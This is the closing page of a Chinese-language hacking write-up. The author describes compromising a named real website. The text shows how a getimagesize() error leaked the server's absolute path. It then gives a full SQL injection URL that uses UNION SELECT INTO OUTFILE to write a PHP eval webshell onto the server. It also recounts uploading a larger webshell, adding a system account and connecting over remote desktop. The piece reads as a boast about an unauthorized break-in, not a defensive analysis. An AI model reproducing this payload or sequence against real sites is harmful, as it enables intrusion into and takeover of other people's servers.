喝杯水冷静了下，想起来我已经知道它的安全模式是关闭的而且我们有足够的权限，这意味着什么？嘿嘿，只要知道路径就能通过注射导出一个webshell。现在的问题就是得到路径了，利用uploadpic.php中getimagesize()函数的小bug，先在后台添加上传类型 text/asa，然后到前台传图片的地方传个asa文件，这个函数无法读取起大小，暴出错误时泄露了绝对路径


下面最辉煌的时刻终于要到来了，构造导出webshell的语句

http://www.jay2u.com/jaynews/index.php?action=newsView&newsID=660%20%20and%201=2%20union%20select%201,2,&#39;<?eval($_POST[cmd])?>',4%20from%20mysql.user%20into%20outfile%20'D:\\website\\jayweb\\forum\\userpix\\cnsst.php'/*
成功了！！


用客户端连上，传了个大马

由于编码问题看着有点乱，一样使用，执行命令看看


好象服务器的php是系统权限的，添加了一个用户


连上3389参观下闪人


文章到这里就结束了，没什么技术含量。主要还是服务器安全做的不好，最后才能得到最高权限。最后感谢cn，影子等兄弟的帮助，感谢www.oldjun.com,是你们在我不开心的时候给了我力量给了我寄托！

上一页  [1] [2] [3]